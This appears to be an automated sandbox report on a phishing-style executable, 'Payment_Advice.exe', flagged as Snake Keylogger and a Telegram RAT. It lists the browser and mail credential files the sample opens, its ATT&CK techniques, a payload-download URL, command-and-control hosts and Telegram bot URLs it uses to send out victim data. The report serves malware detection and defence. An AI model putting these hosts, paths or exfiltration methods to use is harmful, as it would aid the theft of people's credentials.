Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Windows Service	1 Windows Service	2 Obfuscated Files or Information	LSASS Memory	116 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	1 Registry Run Keys / Startup Folder	111 Process Injection	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	21 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment_Advice.exe	34%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe	34%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://contoso.com/License	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
http://r10.i.lencr.org/01	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	0%	Avira URL Cloud	safe
https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
http://mail.electromac.com.bo	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://electromac.com.bo	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
http://r10.o.lencr.org0#	0%	Avira URL Cloud	safe
https://www.reap.skyestates.com.mt/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	malware
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a	0%	Avira URL Cloud	safe
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.reap.skyestates.com.mt	108.167.181.251	true	false	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
electromac.com.bo	192.185.142.133	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
mail.electromac.com.bo	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN	wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://r10.i.lencr.org/01	wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB	wab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	wab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.electromac.com.bo	wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	wab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reap.skyestates.com.mt/	wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://r10.o.lencr.org0#	wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://electromac.com.bo	wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Payment_Advice.exe, Payment_Advice.exe.2.dr	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a	wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org	wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
192.185.142.133	electromac.com.bo	United States	46606	UNIFIEDLAYER-AS-1US	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
108.167.181.251	www.reap.skyestates.com.mt	United States	46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481503
Start date and time:	2024-07-25 10:17:50 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment_Advice.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/11@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 175 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5884 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Payment_Advice.exe

Simulations

Behavior and APIs

Time	Type	Description
04:18:41	API Interceptor	43x Sleep call for process: powershell.exe modified
04:19:23	API Interceptor	373582x Sleep call for process: wab.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Install.msi	Get hash	malicious	Unknown	Browse
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse
	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse
192.185.142.133	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
188.114.97.3	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	bshd1.shop/OP341/index.php
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	crst2.shop/HM341/index.php
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	bshd1.shop/OP341/index.php
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	crst2.shop/HM341/index.php
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	vlha.shop/LB341/index.php
	http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror	Get hash	malicious	HTMLPhisher	Browse	kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jk8Z5I
	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	tny.wtf/cyd
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download
193.122.6.168	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Orden de Compra..exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Fekdjuvq.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	neworder.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ORDER INQUIRY_QTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	QvS0a5bvCMM8EUj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
www.reap.skyestates.com.mt	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
